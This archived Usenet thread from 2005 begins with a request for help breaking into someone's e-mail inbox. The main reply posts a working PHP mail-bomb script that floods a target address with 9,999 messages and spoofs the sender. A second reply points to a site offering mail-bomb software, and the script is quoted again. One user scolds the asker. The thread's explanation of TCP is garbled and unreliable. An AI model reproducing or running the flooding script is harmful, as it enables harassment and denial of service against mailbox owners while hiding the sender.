Discussion:
Hacking someone's e-mail adress
(too old to reply)
FaiNt
2005-12-06 21:11:11 UTC
Permalink
I know it's unlegal and pretty unpolite but I'm really interested in
someone's mail inbox, so do you know how to open it but without knowing his
password?
Thx-
hactic
2005-12-12 06:36:58 UTC
Permalink
Yes, we ( or at least some of us ) do
Post by FaiNt
I know it's unlegal and pretty unpolite but I'm really interested in
someone's mail inbox, so do you know how to open it but without knowing his
password?
Thx-
Daemon
2005-12-14 17:53:37 UTC
Permalink
Post by FaiNt
I know it's unlegal and pretty unpolite but I'm really interested in
someone's mail inbox, so do you know how to open it but without knowing his
password?
Thx-
It's as simple as faking your identify on this news group. At the
beginning of my software configuration it asked me for a name and email,
if I entered in false information, it would still work.

It is more difficult to achieve it if you rely on a remote SMTP server,
but it is not impossible. It is best to simply down or execute your
local SMTP, and use a programming language that already knows the SMTP
language.

For an example, I use this as a inbox flooder:

<?php

$MailToAddress = "***@riaa.com";
$MailSubject = "Fuck Off!";
$email = "***@loserswork@riaa.com";
$Message = "Go Away!";

for ($i = 1; $i <= 9999; $i++) {
mail($MailToAddress, $MailSubject, $Message, "Content-Type:
text/html; charset=ISO-8859-1\r\nFrom: ".$email."\r\nBCc: ".$MailToCC);
sleep(2);
echo '<pre>Sent message ' . $i . ' successfully!</pre>' . "\n";
}


?>

That creates a loop, and uses the varibles at the beginning to
administer the email to the user. And simply uses the function email to
connect, and instructs the local mail/smtp demon to send the email.

Most often, you can use it to mask who you are, but don't entrust all
your security to it!!

If say you were to send a formal email to bill gates, cough, don't trust
they don't log packets or service requests, cause they will trace the ip
it was sent from.

TCP Rules:
Random Socket connect to email server
Computer 1 -------------------------------------> Computer 2

Ping connection, verify connection exists
Computer 1 <------------------------------------- Computer 2

Verifys the ping, responding a pong.
Computer 1 -------------------------------------> Computer 2

Connection is open!
Sends Data (Email)
Computer 1 -------------------------------------> Computer 2

Validates email sent...
Computer 1 <------------------------------------- Computer 2

Connetion lost by remote host.
DoS Dragon
2005-12-20 01:05:48 UTC
Permalink
Go to this site http://www.dos-dragon.com
There is software there that will allow you to do a mail bomb.
Post by Daemon
Post by FaiNt
I know it's unlegal and pretty unpolite but I'm really interested in
someone's mail inbox, so do you know how to open it but without knowing his
password?
Thx-
It's as simple as faking your identify on this news group. At the
beginning of my software configuration it asked me for a name and email,
if I entered in false information, it would still work.
It is more difficult to achieve it if you rely on a remote SMTP server,
but it is not impossible. It is best to simply down or execute your local
SMTP, and use a programming language that already knows the SMTP language.
<?php
$MailSubject = "Fuck Off!";
$Message = "Go Away!";
for ($i = 1; $i <= 9999; $i++) {
mail($MailToAddress, $MailSubject, $Message, "Content-Type: text/html;
charset=ISO-8859-1\r\nFrom: ".$email."\r\nBCc: ".$MailToCC);
sleep(2);
echo '<pre>Sent message ' . $i . ' successfully!</pre>' . "\n";
}
?>
That creates a loop, and uses the varibles at the beginning to administer
the email to the user. And simply uses the function email to connect, and
instructs the local mail/smtp demon to send the email.
Most often, you can use it to mask who you are, but don't entrust all your
security to it!!
If say you were to send a formal email to bill gates, cough, don't trust
they don't log packets or service requests, cause they will trace the ip
it was sent from.
Random Socket connect to email server
Computer 1 -------------------------------------> Computer 2
Ping connection, verify connection exists
Computer 1 <------------------------------------- Computer 2
Verifys the ping, responding a pong.
Computer 1 -------------------------------------> Computer 2
Connection is open!
Sends Data (Email)
Computer 1 -------------------------------------> Computer 2
Validates email sent...
Computer 1 <------------------------------------- Computer 2
Connetion lost by remote host.
Daemon
2005-12-20 06:47:25 UTC
Permalink
Post by DoS Dragon
Go to this site http://www.dos-dragon.com
There is software there that will allow you to do a mail bomb.
Post by FaiNt
I know it's unlegal and pretty unpolite but I'm really interested in
someone's mail inbox, so do you know how to open it but without knowing his
password?
Thx-
Software.. really, like an application, some pathetic luser downloades
and executes asa win32 application... thats pretty pathetic...

Besides, why?

I just told you one method with php...
JAZZ
2006-03-18 03:35:21 UTC
Permalink
UR the kind that would steal snail mail from ur subject's mailbox.
Mind ur own business sneak thief, & let others mind their own. U'll
be better off-
Post by FaiNt
I know it's unlegal and pretty unpolite but I'm really interested in
someone's mail inbox, so do you know how to open it but without knowing his
password?
Thx-
Loading...